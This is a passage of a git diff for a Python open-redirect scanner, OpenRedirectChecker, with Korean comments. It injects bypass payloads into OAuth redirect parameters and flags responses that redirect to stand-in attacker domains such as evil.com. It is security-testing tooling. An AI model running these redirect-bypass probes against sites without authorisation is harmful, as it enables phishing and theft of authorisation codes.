시작") + + # 2. 우회 URL 생성 if original_redirect_value.startswith('http'): # 이미 완전한 URL인 경우 bypassed_redirect = payload.mutate(original_redirect_value) @@ -1182,27 +1451,31 @@ class OpenRedirectChecker: full_original = f"https://{original_redirect_value}" bypassed_redirect = payload.mutate(full_original) - # 새로운 쿼리 구성 + # 3. 파라미터 보존 전략 - 원본 url의 다른 파라미터들은 그대로 두고 redirect 파라미터만 악성으로 바꿈 modified_query = query.copy() - modified_query[redirect_param] = [bypassed_redirect] # 동적 파라미터명 + modified_query[redirect_param] = [bypassed_redirect] + new_query_string = urlencode(modified_query, doseq=True) test_url = urlunparse(parsed_url._replace(query=new_query_string)) - # 요청 전송 - response = await self._send_request(test_url, headers) + # 4. 요청 전송 + response = await self._send_request(test_url) - # Open Redirect 응답 분석 - result = await self._analyze_response( - original_url, test_url, bypassed_redirect, response, payload - ) + # 5. 응답 분석 + result = await self._analyze_response(original_url, test_url, bypassed_redirect, response, payload) + + if result: + print(f"[PATTERN] ✅ {payload.name} → SUCCESS") + else: + print(f"[PATTERN] ✅ {payload.name} → SAFE") return result except Exception as e: - print(f"[ERROR] {payload.name} 테스트 실패: {e}") + print(f"[PATTERN] ❌ {payload.name} → ERROR: {e}") return False - """ Open Redirect 전용 응답 분석 """ + """ 응답 분석 """ async def _analyze_response(self, original_url, test_url, bypassed_redirect, response, payload): status = response['status'] location = response['location'] @@ -1216,8 +1489,9 @@ class OpenRedirectChecker: # 악성 도메인으로 리다이렉트되었는지 확인 if self._is_redirected_to_malicious_domain(location): - print(f"[🎯 VULNERABILITY] {payload.name} Open Redirect 성공!") - print(f"[CRITICAL] 악성 도메인으로 리다이렉트: {location}") + + print(f"[🎯 VULNERABILITY CONFIRMED] Open Redirect 취약점 발견!") + await self._report_open_redirect_vulnerability( original_url, test_url, bypassed_redirect, location, payload @@ -1229,8 +1503,6 @@ class OpenRedirectChecker: def _is_redirected_to_malicious_domain(self, location: str) -> bool: """실제로 악성 도메인으로 리다이렉트되었는지 확인""" - print(f"[DEBUG] 리다이렉트 분석: {location}") - try: location_parsed = urlparse(location) location_host = location_parsed.hostname @@ -1238,35 +1510,47 @@ class OpenRedirectChecker: # 실제 호스트만 확인 (URL 파라미터는 무시) if not location_host: return False + + # 메이저 OAuth 제공자 도메인이면 취약점 아님 + safe_domains = [ + # Google (구글) + "accounts.google.com", "google.com", "www.google.com", + "oauth2.googleapis.com", "accounts.youtube.com", - # Facebook 자체 도메인이면 취약점 아님 - facebook_domains = ["www.facebook.com", "facebook.com", "m.facebook.com"] - if any(fb_domain in location_host.lower() for fb_domain in facebook_domains): - print(f"[DEBUG] ❌ Facebook 내부 페이지로 리다이렉트 - 취약점 아님") + # Facebook/Meta (페이스북) + "www.facebook.com", "facebook.com", "m.facebook.com", + "graph.facebook.com", "developers.facebook.com", + + # GitHub (깃헙) ← 추가! + "github.com", "www.github.com", "api.github.com", + + # Microsoft (마이크로소프트) ← 추가! + "login.microsoftonline.com", "login.live.com", + "account.live.com", "login.windows.net", "login.microsoft.com", + "outlook.live.com", "account.microsoft.com", + ] + if any(safe_domain in location_host.lower() for safe_domain in safe_domains): return False - # 실제 악성 도메인들만 체크 + # 실제 악성 도메인들 malicious_domains = ["evil.com", "attacker.com", "malicious.site"] if any(domain in location_host.lower() for domain in malicious_domains): - print(f"[DEBUG] ✅ 실제 악성 도메인으로 리다이렉트!") + print(f"[MALICIOUS_REDIRECT] 🚨 악성 도메인으로 리다이렉트 감지: {location_host}") return True - + return False except Exception as e: - print(f"[DEBUG] 파싱 에러: {e}") return False """ 취약점 보고서 생성 """ - async def _report_open_redirect_vulnerability(self, original_url, test_url, - bypassed_redirect, location, payload): + async def _report_open_redirect_vulnerability(self, original_url, test_url, bypassed_redirect, location, payload): """Open Redirect 취약점 보고서 생성""" - pattern_name = payload.name if hasattr(payload, 'name') else str(payload) - pattern_description = payload.description if hasattr(payload, 'description') else "Unknown bypass pattern" + pattern_name = getattr(payload, 'name', 'unknown') + pattern_description = getattr(payload, 'description', 'Unknown bypass pattern') description = ( f"Open Redirect 취약점 발견!\n\n" - f"-- 상세 정보 --:\n" f"• 우회 패턴: {pattern_name}\n" f"• 설명: {pattern_description}\n" f"• 원본 URL: {original_url}\n" @@ -1275,16 +1559,24 @@ class OpenRedirectChecker: f"• 실제 리다이렉트 위치: {location}\n\n" f"🚨 이 취약점을 이용하면 피싱 공격이 가능합니다!\n" ) - + report_vuln( - title="Open Redirect Vulnerability", + title="OAuth Open Redirect Vulnerability", desc=description, - status="MEDIUM", # Open Redirect는 보통 Medium + status="MEDIUM", uri=test_url ) - print(f"[🎯 MEDIUM] Open Redirect 취약점 발견 및 보고 완료!") - print(f"[INFO] 패턴: {pattern_name}, 리다이렉트: {location}") + print(f"🎯 OAuth Open Redirect 취약점 발견 및 보고 완료!") - # TODO: 우리가 탐지하는 IdP가 제한적이기 때문에 각 IdP의 uri 패턴을 탐지하는 것도 좋아보임 - # Loaction 헤더에 담긴 인가 코드 뿐만 아니라, script나 다른 방식으로도 인가 코드가 전달될 수 있음 - \ No newline at end of file + def reset_session(self): + """새 세션 시작 (새 타겟 사이트 테스트 시)""" + if len(self.tested_endpoints) > 1000: + old_entries = list(self.tested_endpoints)[:500] + for entry in old_entries: + self.tested_endpoints.discard(entry) + + self.testing_targets.clear() + + async def cleanup(self): + """정리 작업""" + await self.close_session()